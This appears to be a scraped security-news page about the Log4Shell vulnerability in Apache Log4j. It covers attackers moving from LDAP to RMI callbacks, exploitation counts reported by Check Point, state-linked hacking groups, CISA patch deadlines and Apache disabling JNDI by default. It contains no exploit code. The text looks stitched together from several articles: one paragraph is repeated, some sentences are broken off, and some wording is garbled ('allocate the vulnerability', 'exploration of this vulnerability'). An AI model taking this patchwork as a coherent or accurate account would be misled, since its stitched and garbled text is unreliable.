Security News
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success. From LDAP to RMI. Most attacks targeting the Log4j "Log4Shell" vulnerability have been through the LDAP service.
At that point it was reported that there were over 100 attempts to exploit the vulnerability every minute. "Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of those attempts were made by known malicious groups," said cybersecurity company Check Point.
the Industrial Internet equipment in our OT networks is connected out to these at-risk cloud services. Worse, once sophisticated ransomware groups or other attackers have a foothold in industrial vendors' web services, those threat actors can be very difficult to detect or dislodge, even after the Log4j vulnerability is long since history.
Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. It's interesting this is coming to light as the US government's Cybersecurity and Infrastructure Security Agency tells all federal civilian agencies to take care of CVE-2021-44228 by December 24, 2021.
"Our reports of the last 48 hours prove that both criminal-hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors' operations are to be revealed in the coming days," Check Point added. Log4J based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.
The Log4j security vulnerability known as Log4Shell is shaping up to be one of the worst security flaws of the year, potentially affecting millions of applications and painting a bullseye on unpatched systems that hackers can compromise and control. Revealed last week but reported to Apache in November, Log4Shell is a zero-day vulnerability in the company's Log4J utility, which is used by developers and organizations around the world to log requests and error messages for Java applications.
As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability in the Apache Log4j Java-based logging library. Also known as Log4Shell or LogJam, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.
Commentary: Those searching for a single cause for the Log4j vulnerability - whether it's open source is not secure, or open source is not sustainable - are getting it wrong. Open source isn't a security problem, and open source sustainability is a complicated issue.
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. In its latest release notes for Log4j 2.x, the Apache Foundation said: "Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it."
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. Apache also conceded JNDI "Has significant security issues," so it's decide it is best to just deactivate it by default.